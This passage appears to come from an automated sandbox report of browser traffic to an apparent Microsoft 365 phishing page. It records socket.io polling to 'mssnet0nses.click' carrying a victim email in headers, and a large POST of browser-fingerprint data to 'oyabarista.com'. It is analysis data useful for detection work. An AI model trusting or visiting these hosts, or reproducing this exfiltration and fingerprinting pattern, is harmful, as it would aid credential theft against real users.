                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2025-03-27 13:41:52 UTC833INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:52 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v1eWoEsOcwIKzVtRhZDB%2Bj%2FUGzjBrsS0ZZnZzPHPgAPSa77W4cZda5ZRni%2F2N2KOIG%2FVDrzOrXBYyUIPEfAEUN71VWDwe7dIp8%2FCEbc7ybmC0ND3dzrofZsBTrGYPUFf4NosKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ec7df2f9e08-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84100&min_rtt=83914&rtt_var=17984&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1121&delivery_rate=36180&cwnd=252&unsent_bytes=0&cid=9c7c54e32f3cabe9&ts=307&x=0"
                                                        2025-03-27 13:41:52 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}
                                                        2025-03-27 13:41:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        50192.168.2.549804172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:51 UTC425OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrc-m HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:52 UTC854INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:52 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5oX8pj7Y4KS8jYrxQlLQF23MojQox7%2FP0YsANNe126u7EFa36OV3lWCucpyJ4sOot%2B%2BWkhHuZ8WrcpWkOY%2BH9i0wg%2FSN9zRTOwgUbpp%2BgrXiVEfaRn9jmLHoFKwe%2FyDfIsqYgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ec7eef749aa-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84578&min_rtt=84466&rtt_var=17989&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=997&delivery_rate=36036&cwnd=252&unsent_bytes=0&cid=0ac56a23a94687c4&ts=264&x=0"
                                                        2025-03-27 13:41:52 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 51 42 43 4d 72 39 4f 61 6c 41 51 67 4f 73 4e 7a 41 41 66 41 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"QBCMr9OalAQgOsNzAAfA","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        51192.168.2.549801172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:51 UTC592OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrdFK&sid=cDcq_6oiPpEKxHw5AAe_ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:52 UTC943INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:52 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANq%2BTlA0yI1GTEPYirVZx5Hso88vJH8EJKU3X0M72ZgNDANqMV1vAr8Cj2Jc0CudOS9fDY7c1qRvGdRxIozhEr%2FQNfVUp9Mnd0jrAbeFp7IKvFvLkfyJyy9gVaT%2BORgH%2F9OSIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ec7ef534382-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83660&min_rtt=83627&rtt_var=17692&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1164&delivery_rate=36506&cwnd=252&unsent_bytes=0&cid=a8ac391da32c0262&ts=309&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        52192.168.2.549805172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:52 UTC752OUTPOST /socket.io/?EIO=4&transport=polling&t=PNNrdFJ&sid=cDcq_6oiPpEKxHw5AAe_ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Content-Length: 2
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Content-type: text/plain;charset=UTF-8
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:52 UTC2OUTData Raw: 34 30
                                                        Data Ascii: 40
                                                        2025-03-27 13:41:52 UTC838INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:52 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gVQjM7K9nSHU9U9pph%2BJVYYS9CgGxIvWM1xeZvWdlC0eSym0%2BiUOLrPuwSxo5fmKT534fWR9TD3TtceL6N66ySiSySiv8ExVr8EoJwXPM1IIzEGysc4MUY3GVykv6%2B13FxfElQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ecad88f43a9-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83769&min_rtt=83757&rtt_var=17688&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1348&delivery_rate=36476&cwnd=252&unsent_bytes=0&cid=8e986c0f16fd9286&ts=307&x=0"
                                                        2025-03-27 13:41:52 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                        Data Ascii: 2ok
                                                        2025-03-27 13:41:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        53192.168.2.549806172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:52 UTC692OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrdFK&sid=cDcq_6oiPpEKxHw5AAe_ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:53 UTC298INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:53 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: no-store
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ecad92d5ed0-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-27 13:41:53 UTC1INData Raw: 31
                                                        Data Ascii: 1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        54192.168.2.549807172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:52 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrdFJ&sid=cDcq_6oiPpEKxHw5AAe_ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:53 UTC797INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:53 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4hytfM4nlZcm2dBtBsH8SO8ra4uAIfVd9KrIzZTcF%2FsklkcA1Yytpe5Jq1WfXZOuNVNGCplxmpRohVf2dqTYtM8UOkpgahIBkE5BoEqKdMOjwgu%2FDfx%2BKvLJpQAysdz3csO2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ecddc3093b9-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84954&min_rtt=84772&rtt_var=18157&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1022&delivery_rate=35825&cwnd=252&unsent_bytes=0&cid=cf42aeb97900bd81&ts=307&x=0"
                                                        2025-03-27 13:41:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        55192.168.2.549797104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:53 UTC1041OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        Content-Length: 147028
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://www.oyabarista.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:53 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                        2025-03-27 13:41:53 UTC16384OUTData Raw: 32 43 25 32 32 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42
                                                        Data Ascii: 2C%22XMLHttpRequest%22%3A%22function+XMLHttpRequest%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B
                                                        2025-03-27 13:41:53 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 50 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69
                                                        Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAnimatedString%22%3A%22function+SVGAnimatedString%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedRect%22%3A%22function+SVGAnimatedRect%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedPreserveAspectRatio%22%3A%22functi
                                                        2025-03-27 13:41:53 UTC16384OUTData Raw: 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 61 70 74 69 6f 6e 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62
                                                        Data Ascii: 7D%22%2C%22HTMLTableColElement%22%3A%22function+HTMLTableColElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCellElement%22%3A%22function+HTMLTableCellElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCaptionElement%22%3A%22function+HTMLTab
                                                        2025-03-27 13:41:53 UTC16384OUTData Raw: 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 66 72 61 6d 65 73 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 66
                                                        Data Ascii: B+%5Bnative+code%5D+%7D%22%2C%22CSSLayerBlockRule%22%3A%22function+CSSLayerBlockRule%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeywordValue%22%3A%22function+CSSKeywordValue%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeyframesRule%22%3A%22function+CSSKeyf
                                                        2025-03-27 13:41:53 UTC16384OUTData Raw: 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 57 72 69 74 61 62 6c 65 46 69 6c 65 53 74
                                                        Data Ascii: %28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemFileHandle%22%3A%22function+FileSystemFileHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemHandle%22%3A%22function+FileSystemHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemWritableFileSt
                                                        2025-03-27 13:41:53 UTC16384OUTData Raw: 32 25 32 43 25 32 32 54 61 73 6b 53 69 67 6e 61 6c 25 32 32 25 32 43 25 32 32 54 61 73 6b 50 72 69 6f 72 69 74 79 43 68 61 6e 67 65 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 54 61 73 6b 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 32 43 25 32 32 54 61 73 6b 41 74 74 72 69 62 75 74 69 6f 6e 54 69 6d 69 6e 67 25 32 32 25 32 43 25 32 32 53 79 6e 63 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 53 75 62 6d 69 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 4c 69 73 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 52 65 61 64 4f 6e 6c 79 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 25 32 32 25 32 43 25 32 32 53 74 6f 72
                                                        Data Ascii: 2%2C%22TaskSignal%22%2C%22TaskPriorityChangeEvent%22%2C%22TaskController%22%2C%22TaskAttributionTiming%22%2C%22SyncManager%22%2C%22SubmitEvent%22%2C%22StyleSheetList%22%2C%22StyleSheet%22%2C%22StylePropertyMapReadOnly%22%2C%22StylePropertyMap%22%2C%22Stor
                                                        2025-03-27 13:41:53 UTC16384OUTData Raw: 32 63 6c 6f 73 65 25 32 32 25 32 43 25 32 32 63 6f 6e 66 69 72 6d 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 25 32 32 25 32 43 25 32 32 66 65 74 63 68 25 32 32 25 32 43 25 32 32 66 69 6e 64 25 32 32 25 32 43 25 32 32 66 6f 63 75 73 25 32 32 25 32 43 25 32 32 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 25 32 32 25 32 43 25 32 32 67 65 74 53 65 6c 65 63 74 69 6f 6e 25 32 32 25 32 43 25 32 32 6d 61 74 63 68 4d 65 64 69 61 25 32 32 25 32 43 25 32 32 6d 6f 76 65 42 79 25 32 32 25 32 43 25 32 32 6d 6f 76 65 54 6f 25 32 32 25 32 43 25 32 32 6f 70 65 6e 25 32 32 25 32 43 25 32 32 70 6f 73 74 4d 65 73 73 61 67 65 25 32 32 25 32 43 25 32 32 70 72 69 6e 74 25 32 32 25 32 43 25 32 32 70 72 6f 6d 70 74 25 32 32 25 32 43 25 32 32
                                                        Data Ascii: 2close%22%2C%22confirm%22%2C%22createImageBitmap%22%2C%22fetch%22%2C%22find%22%2C%22focus%22%2C%22getComputedStyle%22%2C%22getSelection%22%2C%22matchMedia%22%2C%22moveBy%22%2C%22moveTo%22%2C%22open%22%2C%22postMessage%22%2C%22print%22%2C%22prompt%22%2C%22
                                                        2025-03-27 13:41:53 UTC15956OUTData Raw: 53 74 61 6d 70 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 74 69 6d 65 53 74 61 6d 70 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 6f 6e 74 65 78 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 6f 6e 74 65 78 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 54 61 73 6b 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 54 61 73 6b 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6d 65 6d 6f 72 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 4d 65 6d 6f 72
                                                        Data Ascii: Stamp%22%3A%22function+timeStamp%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22context%22%3A%22function+context%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createTask%22%3A%22function+createTask%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22memory%22%3A%22%5Bobject+Memor


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        56192.168.2.549809172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:53 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrdFK&sid=cDcq_6oiPpEKxHw5AAe_ HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
